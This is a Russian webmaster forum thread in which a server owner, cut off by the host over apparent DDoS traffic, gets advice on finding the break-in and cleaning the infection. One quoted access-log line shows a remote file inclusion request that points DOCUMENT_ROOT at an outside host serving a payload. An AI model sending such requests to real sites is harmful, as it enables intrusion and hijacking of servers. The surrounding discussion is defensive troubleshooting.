- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Да почему же... Просто надо аудит проводить, а не просто логи читать... Там одних логов мало. Надо заразу еще и вычистить, да и найти дыру... Вот дыру по логам может и найдете.
появилось мнение, что вскрывают через
209.172.33.230 - - [28/Jun/2009:05:32:22 +0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.hb.let.tw//xoops_lib/modules/protector/configs/banner.txt??? HTTP/1.1" 200 71790 "-" "Mozilla/5.0"
вскрывают в течение суток сразу после удаления заразы из /tmp
на мой взгляд, через сапу
http://forum.sape.ru/showthread.php?t=32218
сделал себе htaccess как здесь http://blog.sjinks.org.ua/security/361-minimizing-consequences-of-http-scans/
и убрал $_SERVER['DOCUMENT_ROOT'] из кода сапы
но по идее на стороне сервера надо как-то сделать, чтобы из адресной строки такие переменные не переназначались
Ваш сервер отключен от сети.
Что-то здесь не чисто... один сервер и 1Gbit ддос.O_o Была ли ддос атака?! Они логи предоставили, на какие IP или сайты от Вас шли запросы?
Они логи предоставили, на какие IP или сайты от Вас шли запросы?
а какой мне в этом смысл? там список может быть из тысяч IP
но по идее на стороне сервера надо как-то сделать, чтобы из адресной строки такие переменные не переназначались
Может register_global отключить стоит?
Может register_global отключить стоит?
он был выключен
Что-то здесь не чисто... один сервер и 1Gbit ддос.O_o Была ли ддос атака?! Они логи предоставили, на какие IP или сайты от Вас шли запросы?
Первая "D" в DDOS вообще означает Distributed, на одном сервере с парой ip это врядли возможно. А вот принимать участие в DDOS под управлением бота этот сервер вполне мог. Правда в исходящий поток в таких объемах очень слабо верится.
Что-то хостер не договаривает.
Я бы просто на месте ТС закрыл весь исход и не парился
а какой мне в этом смысл? там список может быть из тысяч IP
Нет, Вы не поняли. Для того, чтобы закрыть сервер за DDoS, требуется Abuse от получателя bad-пакетов.
Зная адрес получателя таких пакетов, Вы сможете найти, либо логи ботнета, либо процессы, которые соединяются с этим IP.
Нет, Вы не поняли. Для того, чтобы закрыть сервер за DDoS, требуется Abuse от получателя bad-пакетов.
Зная адрес получателя таких пакетов, Вы сможете найти, либо логи ботнета, либо процессы, которые соединяются с этим IP.
Сервер могли закрыть за трафик... Думаю, что там shared-канал. Вряд ли у ТС честные 1Gb/s...
Атакует ботнет (вместе с вашим сервером) обычно один конкретный сайт.